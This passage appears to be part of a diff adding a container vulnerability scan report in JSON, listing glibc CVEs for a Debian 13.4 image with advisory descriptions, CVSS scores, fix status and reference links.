"libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "FixedVersion": "2.41-12+deb13u3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4437", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:876d866d2ef3d9d8a5f06946a37415ec333664c368626ec868195f744cdbd9d5", + "Title": "glibc: glibc: Incorrect DNS response parsing via crafted DNS server response", + "Description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-125" + ], + "VendorSeverity": { + "alma": 2, + "azure": 2, + "photon": 3, + "redhat": 2, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:19061", + "https://access.redhat.com/security/cve/CVE-2026-4437", + "https://bugzilla.redhat.com/2449777", + "https://bugzilla.redhat.com/2449783", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449777", + "https://bugzilla.redhat.com/show_bug.cgi?id=2449783", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453117", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438", + "https://errata.almalinux.org/10/ALSA-2026-19061.html", + "https://errata.rockylinux.org/RLSA-2026:20597", + "https://nvd.nist.gov/vuln/detail/CVE-2026-4437", + "https://sourceware.org/bugzilla/show_bug.cgi?id=34014", + "https://www.cve.org/CVERecord?id=CVE-2026-4437", + "https://www.openwall.com/lists/oss-security/2026/03/23/2" + ], + "PublishedDate": "2026-03-20T20:16:49.477Z", + "LastModifiedDate": "2026-04-07T18:41:36.647Z" + }, + { + "VulnerabilityID": "CVE-2026-5435", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-5435", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:2a0ee97f9f63d1e21be544410605ee67edd814cf873332a68526a3405b6c39d2", + "Title": "glibc: glibc: Out-of-bounds write via TSIG record processing", + "Description": "The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-787" + ], + "VendorSeverity": { + "redhat": 2, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-5435", + "https://inbox.sourceware.org/libc-alpha/cover.1777546194.git.fweimer@redhat.com/", + "https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2026-5435", + "https://sourceware.org/bugzilla/show_bug.cgi?id=34033", + "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0011", + "https://www.cve.org/CVERecord?id=CVE-2026-5435" + ], + "PublishedDate": "2026-04-28T13:19:22.29Z", + "LastModifiedDate": "2026-05-05T17:38:37.03Z" + }, + { + "VulnerabilityID": "CVE-2026-5450", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-5450", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:386529417589e0713a871392a4197753d6a8b94c6e648e475a1e3339ca202bb3", + "Title": "glibc: glibc: Heap Buffer Overflow in `scanf` with `%mc` format specifier and large width", + "Description": "Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-122", + "CWE-787" + ], + "VendorSeverity": { + "photon": 4, + "redhat": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H", + "V3Score": 5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-5450", + "https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2026-5450", + "https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997", + "https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450", + "https://www.cve.org/CVERecord?id=CVE-2026-5450" + ], + "PublishedDate": "2026-04-20T21:16:36.85Z", + "LastModifiedDate": "2026-04-23T15:33:34.277Z" + }, + { + "VulnerabilityID": "CVE-2026-5928", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-5928", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:ca5f91be4a6a01be25722969c330a0a17ff9ac83a591111308fe183a6330a48b", + "Title": "glibc: glibc: Information disclosure or denial of service via ungetwc function with specific wide character encodings", + "Description": "Calling the ungetwc function on a FILE stream with wide characters encoded in a character set that has overlaps between its single byte and multi-byte character encodings, in the GNU C Library version 2.43 or earlier, may result in an attempt to read bytes before an allocated buffer, potentially resulting in unintentional disclosure of neighboring data in the heap, or a program crash.\n\nA bug in the wide character pushback implementation (_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate on the regular character buffer (fp-\u003e_IO_read_ptr) instead of the actual wide-stream read pointer (fp-\u003e_wide_data-\u003e_IO_read_ptr). The program crash may happen in cases where fp-\u003e_IO_read_ptr is not initialized and hence points to NULL. The buffer under-read requires a special situation where the input character encoding is such that there are overlaps between single byte representations and multibyte representations in that encoding, resulting in spurious matches. The spurious match case is not possible in the standard Unicode character sets.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-127" + ], + "VendorSeverity": { + "photon": 3, + "redhat": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H", + "V3Score": 5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-5928", + "https://nvd.nist.gov/vuln/detail/CVE-2026-5928", + "https://sourceware.org/bugzilla/show_bug.cgi?id=33998", + "https://www.cve.org/CVERecord?id=CVE-2026-5928" + ], + "PublishedDate": "2026-04-20T21:16:36.963Z", + "LastModifiedDate": "2026-04-23T15:33:43.69Z" + }, + { + "VulnerabilityID": "CVE-2026-6238", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-6238", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:011746fab2815ef207a2f844bbb722127aa0499737d754e5c5682384edff7ecb", + "Title": "glibc: glibc: Application crash or uninitialized memory read via crafted DNS response", + "Description": "The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to validate the RDATA content against the RDATA length in a DNS response when processing LOC, CERT, TKEY or TSIG records, which may allow an attacker to craft a DNS response, causing a target application to crash or read uninitialized memory.\n\nThese functions are for application debugging only and hence not in the path of code executed by the DNS resolver. Further, they have been deprecated since version 2.34 and should not be used by any new applications. Applications should consider porting away from these interfaces since they may be removed in future versions.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-126" + ], + "VendorSeverity": { + "redhat": 2, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-6238", + "https://inbox.sourceware.org/libc-alpha/cover.1777546194.git.fweimer@redhat.com/", + "https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2026-6238", + "https://sourceware.org/bugzilla/show_bug.cgi?id=34069", + "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0012", + "https://www.cve.org/CVERecord?id=CVE-2026-6238" + ], + "PublishedDate": "2026-04-28T19:37:47.523Z", + "LastModifiedDate": "2026-05-04T17:57:24.007Z" + }, + { + "VulnerabilityID": "CVE-2010-4756", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2010-4756", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:545d5f990950b56a2aed9bc73c06b1a7fac40afe330b96cf947b8479aac2ae62", + "Title": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "Description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "Severity": "LOW", + "CweIDs": [ + "CWE-399" + ], + "VendorSeverity": { + "debian": 1, + "nvd": 2, + "redhat": 1 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P", + "V2Score": 4 + }, + "redhat": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V2Score": 5 + } + }, + "References": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://security.netapp.com/advisory/ntap-20241108-0002/", + "https://www.cve.org/CVERecord?id=CVE-2010-4756" + ], + "PublishedDate": "2011-03-02T20:00:01.037Z", + "LastModifiedDate": "2026-04-29T01:13:23.04Z" + }, + { + "VulnerabilityID": "CVE-2018-20796", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2018-20796", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:f6ccc7db07a920b0c6b8c8809f2262e6f9409a8451bb95845cb5f3b348520885", + "Title": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "Description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "Severity": "LOW", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "cbl-mariner": 3, + "debian": 1, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V2Score": 5, + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796" + ], + "PublishedDate": "2019-02-26T02:29:00.45Z", + "LastModifiedDate": "2024-11-21T04:02:11.827Z" + }, + { + "VulnerabilityID": "CVE-2019-1010022", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:9fa603ab5953ae62b182a999bd4d18dbc613e9810bfd8c4c49cc12f38565366f", + "Title": "glibc: stack guard protection bypass", + "Description": "GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.", + "Severity": "LOW", + "CweIDs": [ + "CWE-119" + ], + "VendorSeverity": { + "debian": 1, + "nvd": 4 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V2Score": 7.5, + "V3Score": 9.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022" + ], + "PublishedDate": "2019-07-15T04:15:13.317Z", + "LastModifiedDate": "2024-11-21T04:17:55.5Z" + }, + { + "VulnerabilityID": "CVE-2019-1010023", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:f6b942a1bf327d887b6193d479ed1393351f314374234b9820fc6026e546d7f2", + "Title": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "Description": "GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.", + "Severity": "LOW", + "VendorSeverity": { + "debian": 1, + "nvd": 3, + "redhat": 1 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "V2Score": 6.8, + "V3Score": 8.8 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "V3Score": 7.8 + } + }, + "References": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023" + ], + "PublishedDate": "2019-07-15T04:15:13.397Z", + "LastModifiedDate": "2024-11-21T04:17:55.643Z" + }, + { + "VulnerabilityID": "CVE-2019-1010024", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:d1340b1ddf2079d05ee843ee5cb4160266329f934bb992e9e5f6dbe7d37d8385", + "Title": "glibc: ASLR bypass using cache of thread stack and heap", + "Description": "GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.", + "Severity": "LOW", + "CweIDs": [ + "CWE-200" + ], + "VendorSeverity": { + "debian": 1, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V2Score": 5, + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024" + ], + "PublishedDate": "2019-07-15T04:15:13.473Z", + "LastModifiedDate": "2024-11-21T04:17:55.843Z" + }, + { + "VulnerabilityID": "CVE-2019-1010025", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:5df10255c5f1e179b04b23325c32e11958ebf475341bf2079a8a17d9c1042bca", + "Title": "glibc: information disclosure of heap addresses of pthread_created thread", + "Description": "GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is \"ASLR bypass itself is not a vulnerability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-330" + ], + "VendorSeverity": { + "debian": 1, + "nvd": 2, + "redhat": 1 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V2Score": 5, + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "V3Score": 2.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025" + ], + "PublishedDate": "2019-07-15T04:15:13.537Z", + "LastModifiedDate": "2024-11-21T04:17:55.96Z" + }, + { + "VulnerabilityID": "CVE-2019-9192", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "Status": "affected", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "SeveritySource": "debian", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-9192", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:df8120974979959b5ca72888cd4263b37b6139042a84d80fff4d6612de2db1d9", + "Title": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "Description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern", + "Severity": "LOW", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "cbl-mariner": 3, + "debian": 1, + "nvd": 3, + "redhat": 1 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V2Score": 5, + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L", + "V3Score": 2.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192" + ], + "PublishedDate": "2019-02-26T18:29:00.34Z", + "LastModifiedDate": "2024-11-21T04:51:10.53Z" + }, + { + "VulnerabilityID": "CVE-2026-4438", + "PkgID": "libc6@2.41-12+deb13u2", + "PkgName": "libc6", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libc6@2.41-12%2Bdeb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "5d316ea4f48d7ebc" + }, + "InstalledVersion": "2.41-12+deb13u2", + "FixedVersion": "2.41-12+deb13u3", + "Status": "fixed", + "Layer": { + "Digest": "sha256:4ec36cb7292a44a45129867ef6d6ae1715956938fbca32c926ec0f600d884101", + "DiffID": "sha256:318bc252656ce5b3c77fc9a13e302bba683f813d4b19c21be6e0ad3acc7adaf1" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4438", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:406f48b98539880edff03bfb1198abc6aac78b46bd78eeee969ddfe3a3092c34", + "Title": "glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions", + "Description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.", + "Severity": "LOW", + "CweIDs": [ + "CWE-20", + "CWE-88" + ], + "VendorSeverity": { + "alma": 2, + "azure": 2, + "photon": 2, + "redhat": 1, + "rocky": 2, + "ubuntu": 2 + }, + "CVSS": { + "redhat": { + "V3Vector": 